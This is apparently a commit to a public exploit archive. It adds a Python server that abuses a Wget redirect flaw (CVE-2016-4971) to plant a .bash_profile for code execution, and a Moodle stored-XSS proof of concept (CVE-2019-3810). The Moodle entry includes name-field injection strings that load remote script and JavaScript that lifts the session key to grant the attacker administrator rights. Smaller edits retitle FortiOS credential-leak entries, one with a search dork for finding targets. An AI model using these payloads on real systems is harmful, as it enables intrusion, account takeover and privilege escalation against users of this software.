DB: 2021-05-01

4 changes to exploits/shellcodes GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) FortiOS < 5.6.0 - Cross-Site Scripting Fortinet FortiOS < 5.6.0 - Cross-Site Scripting FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit) FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit) Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)
2021-05-01 05:01:55 +00:00 · 2021-05-01 05:01:55 +00:00 · 23c2c2fa04
commit 23c2c2fa04
parent b8efbd55c3
5 changed files with 143 additions and 6 deletions
--- a/exploits/hardware/webapps/47287.rb
+++ b/exploits/hardware/webapps/47287.rb
@ -1,4 +1,4 @@
-# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
+# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
 # Google Dork: intext:"Please Login" inurl:"/remote/login"
 # Date: 17/08/2019
 # Exploit Author: Carlos E. Vieira
--- a/exploits/hardware/webapps/47288.py
+++ b/exploits/hardware/webapps/47288.py
@ -1,4 +1,4 @@
-# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
+# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
 # Google Dork: intext:"Please Login" inurl:"/remote/login"
 # Date: 17/08/2019
 # Exploit Author: Carlos E. Vieira
--- a/exploits/linux/remote/49815.py
+++ b/exploits/linux/remote/49815.py
@ -0,0 +1,54 @@
+# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
+# Original Exploit Author: Dawid Golunski
+# Exploit Author: liewehacksie
+# Version: GNU Wget < 1.18 
+# CVE: CVE-2016-4971
+
+import http.server
+import socketserver
+import socket
+import sys
+
+class wgetExploit(http.server.SimpleHTTPRequestHandler):
+
+   def do_GET(self):
+       # This takes care of sending .wgetrc/.bash_profile/$file
+
+       print("We have a volunteer requesting " + self.path + " by GET :)\n")
+       if "Wget" not in self.headers.get('User-Agent'):
+          print("But it's not a Wget :( \n")
+          self.send_response(200)
+          self.end_headers()
+          self.wfile.write("Nothing to see here...")
+          return
+
+       self.send_response(301)
+       print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")
+       new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)
+
+       print("Sending redirect to %s \n"%(new_path))
+       self.send_header('Location', new_path)
+       self.end_headers()
+
+
+HTTP_LISTEN_IP = '192.168.72.2'
+HTTP_LISTEN_PORT = 80
+FTP_HOST = '192.168.72.4'
+FTP_PORT = 2121
+FILE = '.bash_profile'
+
+handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
+
+print("Ready? Is your FTP server running?")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+result = sock.connect_ex((FTP_HOST, FTP_PORT))
+if result == 0:
+   print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))
+else:
+   print("FTP is down :( Exiting.")
+   exit(1)
+
+print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)
+
+handler.serve_forever()
--- a/exploits/php/webapps/49814.txt
+++ b/exploits/php/webapps/49814.txt
@ -0,0 +1,81 @@
+# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)
+# Date: 04/2021
+# Exploit Author: farisv
+# Vendor Homepage: https://moodle.org/
+# Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip
+# Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16
+# CVE: CVE-2019-3810
+
+Moodle is a learning platform designed to provide educators, administrators,
+and learners with a single robust, secure and integrated system to create
+personalised learning environments.
+
+The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for
+privilege escalation from student to administrator.
+
+1. Upload the XSS payload [1] to pastebin or other similar service.
+   Change the value of userid to your own id.
+   Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
+2. Login to your student account.
+3. Set first name with:
+   " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
+4. Set surname with:
+  ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
+5. Ask the administrator to open /userpix/ page or put the link to that page
+   on your post and wait.
+
+If successful, your account will be added as administrator.
+
+See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810
+
+[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.
+
+var webroot = '/';
+var userid = '3';
+var sesskey = '';
+
+function get(path, success) {
+    var xhr = new XMLHttpRequest();
+    xhr.open('GET', webroot + path);
+    xhr.onreadystatechange = function() {
+        if (xhr.readyState > 3 && xhr.status == 200) {
+            success(xhr.responseText);
+        }
+    };
+    xhr.send();
+    return xhr;
+}
+
+function post(path, data, success) {
+    var xhr = new XMLHttpRequest();
+    xhr.open('POST', webroot + path);
+    xhr.onreadystatechange = function() {
+        if (xhr.readyState > 3 && xhr.status == 200) {
+            success(xhr.responseText);
+        }
+    };
+    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
+    xhr.send(encodeURI(data));
+    return xhr;
+}
+
+function setAdmin() {
+    // Assign administrator access to userid
+    bpath = 'admin/roles/admins.php';
+    data = "confirmadd=" + userid + "&sesskey=" + sesskey;
+    post(bpath, data, function(data){});
+}
+
+function getSesskey(data) {
+    var sesskey_find = data.indexOf('"sesskey":"');
+    sesskey = data.substr(sesskey_find + 11, 10);
+    setAdmin();
+}
+
+function payload() {
+    // We can find Sesskey inside JS script in main page
+    get('', getSesskey);
+}
+
+// Start
+payload();
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18445,6 +18445,7 @@ id,file,description,date,author,type,platform,port
 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
 49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware,
+49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40613,7 +40614,7 @@ id,file,description,date,author,type,platform,port
 42381,exploits/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",webapps,php,
 42543,exploits/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,webapps,java,
 42387,exploits/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection",2017-07-27,"Shahab Shamsi",webapps,php,
-42388,exploits/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,webapps,hardware,
+42388,exploits/hardware/webapps/42388.txt,"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,webapps,hardware,
 42401,exploits/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",webapps,jsp,
 42402,exploits/jsp/webapps/42402.rb,"Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",webapps,jsp,
 42403,exploits/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",webapps,php,
@ -42222,7 +42223,7 @@ id,file,description,date,author,type,platform,port
 46163,exploits/windows/webapps/46163.txt,"Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection",2019-01-14,"SySS GmbH",webapps,windows,
 46164,exploits/cgi/webapps/46164.txt,"AudioCode 400HD - Command Injection",2019-01-14,Sysdream,webapps,cgi,
 46168,exploits/php/webapps/46168.txt,"ownDMS 4.7 - SQL Injection",2019-01-15,"Ihsan Sencan",webapps,php,80
-46171,exploits/hardware/webapps/46171.py,"FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure",2019-01-16,"Julio Ureña",webapps,hardware,443
+46171,exploits/hardware/webapps/46171.py,"Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure",2019-01-16,"Julio Ureña",webapps,hardware,443
 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80
 46173,exploits/php/webapps/46173.txt,"doorGets CMS 7.0 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80
 46174,exploits/php/webapps/46174.txt,"ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution",2019-01-16,twosevenzero,webapps,php,80
@ -42668,8 +42669,8 @@ id,file,description,date,author,type,platform,port
 47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php,
 47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp,
 47286,exploits/php/webapps/47286.txt,"Kimai 2 - Persistent Cross-Site Scripting",2019-08-19,osamaalaa,webapps,php,80
-47287,exploits/hardware/webapps/47287.rb,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware,
-47288,exploits/hardware/webapps/47288.py,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47287,exploits/hardware/webapps/47287.rb,"Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47288,exploits/hardware/webapps/47288.py,"Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware,
 47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80
 47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
@ -43983,3 +43984,4 @@ id,file,description,date,author,type,platform,port
 49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution",2021-04-29,"Leonardo Paiva",webapps,php,
 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php,
 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple,
+49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",2021-04-30,"Fariskhi Vidyan",webapps,php,